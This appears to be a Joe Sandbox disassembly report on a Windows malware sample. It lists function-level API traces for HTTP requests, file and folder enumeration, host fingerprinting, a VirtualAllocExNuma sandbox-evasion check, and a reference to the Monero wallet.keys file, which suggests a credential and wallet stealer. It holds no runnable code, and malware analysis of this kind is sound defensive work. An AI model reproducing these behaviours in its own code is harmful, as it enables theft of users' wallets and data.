Instruction ID: e24508c53ef4ed86082260641ff60b974c3e632f8ce08783cfd757e5868c5cf5
Opcode Fuzzy Hash: 4b26408e2d7b6ec85d3578bd082db29fb7f99d85157a4e8061b6fcba592c3ba5
Instruction Fuzzy Hash: 5D214FB1D00209ABDF14DFA5EC49ADD7B74FB44321F108225F915A72D0EB706A0ACF91

Function 005551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0127E570), ref: 00546303
Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0127DDD8,00000000,00000000,00400100,00000000), ref: 00546385
Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228

Strings

ERROR, xrefs: 0055521A
ERROR, xrefs: 00555273

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
Instruction ID: e6d16ada3ff708b3ce11cb7c9bdf117ce77cad8381cca31ccfdf90c49b6b87bf
Opcode Fuzzy Hash: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
Instruction Fuzzy Hash: 03111F30910449A7CB14FF70DD6AAED7B38BF90301F408655FC1A46592EF306B09CB91

Function 00554F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B

lstrcat.KERNEL32(?,00000000), ref: 00554F7A
lstrcat.KERNEL32(?,00561070), ref: 00554F97
lstrcat.KERNEL32(?,012789C0), ref: 00554FAB
lstrcat.KERNEL32(?,00561074), ref: 00554FBD

Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943

Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 99fe609e219cbf41b4719c820d83ef53568f8363a87ba849fd43164dd3c9b161
Instruction ID: c764d443fec126576a83e8c0cf76ee99363e59a14047bbfa82e47d8c3e9b7282
Opcode Fuzzy Hash: 99fe609e219cbf41b4719c820d83ef53568f8363a87ba849fd43164dd3c9b161
Instruction Fuzzy Hash: 6821DA7694020977D754FBB0DC5AEEE373CBB94300F008546B65A93181EE789ACC8FA6

Function 00550740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01278960), ref: 0055079A
StrCmpCA.SHLWAPI(00000000,012787F0), ref: 00550866
StrCmpCA.SHLWAPI(00000000,01278860), ref: 0055099D

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: c70a9995b49d6290b0580be68f2069bd4cd2450e00cac978a15abc6927b22406
Instruction ID: 963b9058006754f4efdd7a4b119ce9c1b563cff9d7240bc92bdcd99ffbf88229
Opcode Fuzzy Hash: c70a9995b49d6290b0580be68f2069bd4cd2450e00cac978a15abc6927b22406
Instruction Fuzzy Hash: FA916975A101099FCB28EF64D995BED7B75FFD4300F508519E80A9F245DB30AA09CB92

Function 00550765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01278960), ref: 0055079A
StrCmpCA.SHLWAPI(00000000,012787F0), ref: 00550866
StrCmpCA.SHLWAPI(00000000,01278860), ref: 0055099D

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: e82fcb920c53bfdb8cb3dc1867233170f862d3bbeb33b0f45c3730d2d20bb635
Instruction ID: f62e655e1c45f7e30e09d06dcf30bf4f5d609c76998b3dc0b06d05a3830ec98f
Opcode Fuzzy Hash: e82fcb920c53bfdb8cb3dc1867233170f862d3bbeb33b0f45c3730d2d20bb635
Instruction Fuzzy Hash: 19817975B102099FCB18EF64C9A5EEDBBB5FFD4300F508519E8099F245DB30AA09CB92

Function 005578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
RtlAllocateHeap.NTDLL(00000000), ref: 00557917
GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
Instruction ID: af00ef862b9f4821313cfb74156a62dc8a62f7e4c2d6f27e3e4e0d1f47adc1bf
Opcode Fuzzy Hash: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
Instruction Fuzzy Hash: 9D0162B1944208EBDB10DF94DD45FAAFBB8F704B21F10421AEA45E3280C37859048BB5

Function 6C653060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C653095

Part of subcall function 6C6535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
Part of subcall function 6C6535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
Part of subcall function 6C6535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
Part of subcall function 6C6535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
Part of subcall function 6C6535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
Part of subcall function 6C6535A0: __aulldiv.LIBCMT ref: 6C6536E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C65309F

Part of subcall function 6C675B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6756EE,?,00000001), ref: 6C675B85
Part of subcall function 6C675B50: EnterCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675B90
Part of subcall function 6C675B50: LeaveCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675BD8
Part of subcall function 6C675B50: GetTickCount64.KERNEL32 ref: 6C675BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6530BE

Part of subcall function 6C6530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C653127
Part of subcall function 6C6530F0: __aulldiv.LIBCMT ref: 6C653140

Part of subcall function 6C68AB2A: __onexit.LIBCMT ref: 6C68AB30

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction ID: 7e821f3c6f95d7c1e9a327f8a3053eed9933defdbf171d57371cc51e0863054d
Opcode Fuzzy Hash: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction Fuzzy Hash: 48F0D612D2078896CB10DF7588911A6B370AF6F114F545729F84463A61FB2071E883DE

Function 00559470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00559484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 005594A5
CloseHandle.KERNEL32(00000000), ref: 005594AF

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: a1ffbab879a0f1db4ef9855d236722be98326e6b94fec79b0d7e4b16fceeb142
Instruction ID: 7dfda3744222e04541eb92ab943a2b0f23bf255c85138437d80abbeefdc38527
Opcode Fuzzy Hash: a1ffbab879a0f1db4ef9855d236722be98326e6b94fec79b0d7e4b16fceeb142
Instruction Fuzzy Hash: 1DF03A7494020CFBEF05DFA4DC4AFE97778FB08301F108599BA0997290D6B46E85CB95

Function 00541110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
ExitProcess.KERNEL32 ref: 00541143

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
Instruction ID: f3aa8f6f6cf297fe64ee3c59b72add0a5333aaa336e3f832f5311aad4c58ff13
Opcode Fuzzy Hash: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
Instruction Fuzzy Hash: 30E0E670985308FBF710ABA19C0EB497A78AB04B45F204055F709761D0D6B92640979E

Function 00551A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
